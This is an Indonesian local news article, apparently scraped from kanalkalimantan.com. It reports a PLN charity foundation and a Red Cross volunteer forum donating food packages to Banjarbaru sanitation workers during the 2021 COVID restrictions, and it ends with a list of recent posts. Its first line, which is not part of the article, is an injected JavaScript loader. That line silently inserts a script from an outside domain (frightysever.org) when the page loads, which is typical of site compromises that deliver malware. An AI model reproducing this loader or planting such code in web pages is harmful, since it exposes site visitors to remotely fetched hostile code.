(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Kota Banjarbaru

YBM PT PLN UIKL Kalimantan-FKALB PMI ULM Salurkan Bantuan ke Pemko Banjarbaru


KANALKALIMANTAN.COM,BANJARBARU – Wali Kota Banjarbaru Aditya Mufti Ariffin menerima bantuan paket Sembako khusus warga yang sedang menjalani isolasi mandiri (Isoman) di Hari Kemerdekaan, Selasa (17/8/2021).

Bantuan diserahkan Senior Manager Keuangan, Komunikasi dan Umum PT PLN UIKL Kalimantan Muchamad Eka Yuliartana hasil donasi bersama Forum Komunikasi Anggota Luar Biasa (FKALB) KSR PMI ULM Banjarbaru dan Yayasan Baitul Mal (YBM) PT PLN UIKL Kalimantan.

Penyerahan bantuan didampingi Manager Aset Properti, Komunikasi dan Umum PT PLN UIKL Kalimantan Akhmad Riyadi dan Koordinator FKALB KSR PMI ULM Banjarbaru Adi Royan Pratama.

 

 

Baca juga: 2020 di Halaman Kantor Bupati HSU, Tahun ini Apel HUT ke-76 Kemerdekaan RI di Lapangan Pahlawan Amuntai

Bantuan dari YBM PT PLN UIKL Kalimantan-FKALB KSR PMI ULM Banjarbaru diberikan untuk petugas kebersihan, petugas sampah, petugas taman dan petugas penerangan jalan umum di kota Banjarbaru.

Senior Manager Keuangan, Komunikasi dan Umum, PT PLN Persero UIKL Kalimantan Muchamad Eka Yuliartana mengatakan, YBM PT PLN UIKL Kalimantan menyerahkan sejumlah uang Rp 67.033.500 untuk bantuan paket sembako yang akan disalurkan kepada dinas terkait.

“Bantuan ini adalah hasil dari dana yang diserahkan dan diamanahkan kepada YBM PT PLN UIKL Kalimantan,” kata Muchamad Eka Yuliartana. Dia berharap pikahnya bisa terus bersinergi dan bekerjasama antar PT PLN UIKL Kalimantan dengan Pemerintah Kota Banjarbaru menciptkan hal bermanfaat, juga untuk memperlancar proses bisnis ketenagalistrikan di PLN pada khususnya dan bermanfaat untuk seluruh warga di Kota Banjarbaru.

Sementara itu Wali Kota Banjarbaru Aditya Mufti Ariffin menyampaikan ucapan terima kasih kepada YBM PT PLN UIKL Kalimantan, yang menyerahkan paket bantuan sembako kepada pasukan kuning, pasukan hijau yang ada di Kota Banjarbaru, yang berada di bawah Dinas LH dan Dinas Perkim. Wali Kota Banjarbaru mengatakan bahwa bantuan ini tentunya sangat bermanfaat dan berarti bagi petugas kebersihan Pemko Banjarbaru terutama di tengah pandemi.

“PPKM level 4 di Kota Banjarbaru tentu sangat berdampak bagi masyarakat, mudah-mudahan dengan adanya bantuan ini bisa meringankan beban dari masyarakat Kota Banjarbaru,” ujarnya.

Baca juga: Hari Pramuka Ke-60 Kwarda Kalsel Gelar Tasyakuran dan Bulan Bakti

Wali Kota mengajak seluruh elemen dan komponen yang ada di Kota Banjarbaru, bersama saling tolong menolong, saling menjaga dan saling mengingatkan.

“Kita membantu warga yang sedang kesusahan karena dampak pandemi, kita menolong masyarakat yang saat ini melaksanakan isolasi mandiri di rumah-rumah agar mereka bisa tetap di rumah tanpa memikirkan beban keseharian,” ingatnya.

“Dan kita juga terus mengingatkan masyarakat untuk tetap menjaga protokol kesehatan. Karena kunci untuk melawan Covid-19 selain vaksin yaitu tetap melaksanakan protokol kesehatan,” pungkasnya. (kanalkalimantan.com/al)

Reporter: al
Editor : kk


Desy Arfianty

Recent Posts

Camat Lurah Boleh Jabat Sekretariat PPK PPS

KANALKALIMANTAN.COM, BANJARBARU - Camat dan Lurah diperbolehkan menjabat sebagai Sekretariat Panitia Pemungutan Kecamatan (PPK) maupun… Read More

4 jam ago

Sekretaris Nasdem Kalsel Melamar Golkar, Rozanie Sadar Cukup Posisi Calon Wagub

KANALKALIMANTAN.COM, BANJARMASIN - Pemilihan Kepala Daerah (Pilkada) serentak 2024, sejumlah tokoh mulai mencari dukungan partai… Read More

4 jam ago

Mesin Terbakar di Udara, Pesawat Jemaah Haji Kloter 5 Embarkasi Makassar Kembali Mendarat

KANALKALIMANTAN.COM, MAKASSAR - Momen mencekam mewarnai penerbangan 450 jemaah haji asal Sulawesi Selatan (Sulsel) terjadi,… Read More

4 jam ago

Meteran Air Leding PAM Bandarmasih Hilang, Biaya Pergantian Ditanggung Pelanggan

KANALAKALIMANTAN.COM, BANJARMASIN - Pelanggan air bersih Perusahan Air Minum (PAM) Bandarmasih Kota Banjarmasin Provinsi Kalimantan… Read More

5 jam ago

Layanan Posyandu Terintegrasi di Desa Manusup

KANALKALIMANTAN.COM, KUALA KAPUAS – Upaya memberikan pelayanan kesehatan dasar kepada masyarakat terus dilakukan Pos Pelayanan… Read More

5 jam ago

Kampung KB Guntung Manggis Masuk Enam Besar Nasional

KANALKALIMANTAN.COM, BANJARBARU - Dukungan segenap unsur pemerintahan mengantarkan Kampung Keluarga Berkualitas (KB) Kelurahan Guntung Manggis… Read More

5 jam ago

This website uses cookies.